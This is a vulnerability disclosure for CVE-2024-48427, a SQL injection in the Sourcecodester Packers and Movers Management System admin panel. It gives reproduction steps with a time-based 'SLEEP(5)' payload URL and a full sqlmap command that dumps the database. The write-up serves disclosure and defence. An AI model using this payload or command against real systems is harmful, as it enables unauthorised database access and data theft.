CVE-2024-48427

Description

A SQL injection vulnerability in Sourcecodester Packers and Movers Management System v1.0 allows remote authenticated users to execute arbitrary SQL commands via the id parameter in /mpms/admin/?page=services/manage_service&id

Vulnerability Type

SQL Injection

Vendor of Product

Sourcecodester

Affected Product Code Base:

https://www.sourcecodester.com/php/15360/packers-and-movers-management-system-phpoop-free-source-code.html - 1.0

Affected Component:

The id parameter of Update Service Details at /mpms/admin/?page=services/manage_service&id

Attack Vectors:

1. Setup the application locally and login to the admin panel using the given default credentials.
2. Navigate to the Vulnerable Page: http://localhost/mpms/admin/?page=services/manage_service&id=2
3. Inject SQL Payload to the id parameter: http://localhost/mpms/admin/?page=services/manage_service&id=1' OR SLEEP(5)-- puNr
4. Observe the Application Response: The page should take noticeably longer (5 seconds) to load if the injection is successful, confirming that the id parameter is vulnerable to SQL injection.
5. Now run SQLMap Tool For Dumping Database Details:
6. sqlmap -u "http://localhost/mpms/admin/?page=services/manage_service&id=1" --cookie="phpMyAdmin=ju34bd3d8q0jdf6td4ntqscaqd;PHPSESSID=eopn8q1p8c1f5m1v5igjoir8k1;" --dbms mysql -p id --risk 3 --level 4 --dbs --dump

Reference:

1. https://owasp.org/www-community/attacks/SQL_Injection
2. https://portswigger.net/web-security/sql-injection